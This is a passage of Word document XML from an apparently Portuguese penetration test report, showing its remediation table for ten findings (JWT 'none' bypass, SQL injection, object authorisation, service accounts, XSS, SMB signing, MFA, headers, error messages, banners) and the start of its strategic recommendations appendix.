            <w:shd w:val="clear" w:color="auto" w:fill="194FE3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73FD72C9" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Janela</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="350" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="194FE3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5D296F12" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2550" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="194FE3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1996EE84" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Ação de correção</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="550" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="194FE3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4E4903C9" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Esforço</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="194FE3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62231AF2" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Prazo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="350" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="194FE3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77CDA973" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>QW</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00287A86" w14:paraId="3045897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B91C1C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FB2C8FB" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Imediata</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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8D527CA" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>F-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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4644BB8" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Fixar o algoritmo esperado (ex.: RS256) no verificador e rejeitar explicitamente "none"; rotacionar segredos e invalidar sessões emitidas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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6B9BBCA" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="10B981"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Baixo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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E662E71" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>2d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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1107AD8" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="059669"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>★</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00287A86" w14:paraId="5A2678B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B91C1C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6B82BCA" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Imediata</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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274EB1B" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>F-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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A6C34EA" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Usar consultas parametrizadas/prepared statements e ORM seguro; adicionar WAF como camada defensiva e princípio do menor privilégio no usuário de banco.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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436C123" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F59E0B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Médio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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39C242C" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>5d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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8247842" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="059669"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00287A86" w14:paraId="17997CB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B91C1C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0F28856" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Imediata</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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364FC05" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>F-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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4252F2D" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Validar a propriedade do objeto no servidor (order.customer_id == session.user_id) e usar referências indiretas por usuário; incluir testes de autorização por objeto.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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18F7F47" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="10B981"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Baixo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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912ADE5" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>3d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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CA601A2" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="059669"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>★</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00287A86" w14:paraId="090833CD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EA580C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65262A7" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Curto prazo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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19F8944" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>F-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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061E56B" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Adotar gMSA ou senhas longas/aleatórias para contas de serviço; monitorar solicitações TGS-REQ anômalas e remover SPNs desnecessários.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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6AB3367" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="EF4444"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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0DFE816" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>20d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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8D75C99" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="059669"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00287A86" w14:paraId="18C919E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EA580C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AB7E743" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Curto prazo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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C2FBA20" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>F-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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E042DB9" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Codificação de saída por contexto, sanitização no servidor e Content-Security-Policy estrita.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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15AF2B7" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F59E0B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Médio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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91E2E86" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>7d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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5EB8E90" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="059669"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00287A86" w14:paraId="4EE498E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EA580C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5F2B855" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Curto prazo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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B968EC9" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>F-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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9F0A33D" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Habilitar/forçar SMB signing via GPO e desabilitar NTLM onde possível.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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FB33C7D" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F59E0B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Médio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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A2485BE" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>10d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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62B86F2" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="059669"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00287A86" w14:paraId="23CE1CA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EA580C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2C9B499" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Curto prazo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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F2228A5" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>F-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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C7E44B1" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Exigir MFA resistente a phishing (FIDO2/WebAuthn) no acesso remoto.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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31E12CA" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F59E0B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Médio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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3C3BD13" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>14d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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7397F1B" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="059669"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00287A86" w14:paraId="10DB777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563EB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52E1773" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Médio prazo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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4465604" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>F-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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95EBCFB" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Adicionar HSTS, CSP e cabeçalhos defensivos; desabilitar suites TLS legadas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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284C7BF" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="10B981"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Baixo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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AEFA6B4" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>3d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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6DB29B3" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="059669"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00287A86" w14:paraId="4568E1A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563EB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E83F0D8" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Médio prazo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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6BB60AA" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>F-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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D783D90" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Padronizar respostas de erro genéricas e registrar detalhes apenas no servidor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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8DE950E" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="10B981"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Baixo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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E090876" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>2d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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B96708F" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="059669"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00287A86" w14:paraId="2FF392A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563EB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3A6D834" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Médio prazo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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2C136BC" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>F-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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95D76BB" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Ocultar/normalizar banners e cabeçalhos de versão.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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1A0B2C2" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="10B981"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Baixo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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CF6999C" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>1d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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B6FED69" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="059669"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E4E3C1B" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SEÇÃO 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A64A211" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="4" w:color="194FE3"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Apêndice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AA19E0" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Recomendações estratégicas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AF8CF5" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B91C1C"/>
        </w:rPr>
        <w:t xml:space="preserve">Imediata: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Corrigir o bypass de JWT (F-01) e a SQL Injection (F-02) — exploráveis remotamente sem autenticação.</w:t>
      </w:r>
    </w:p>
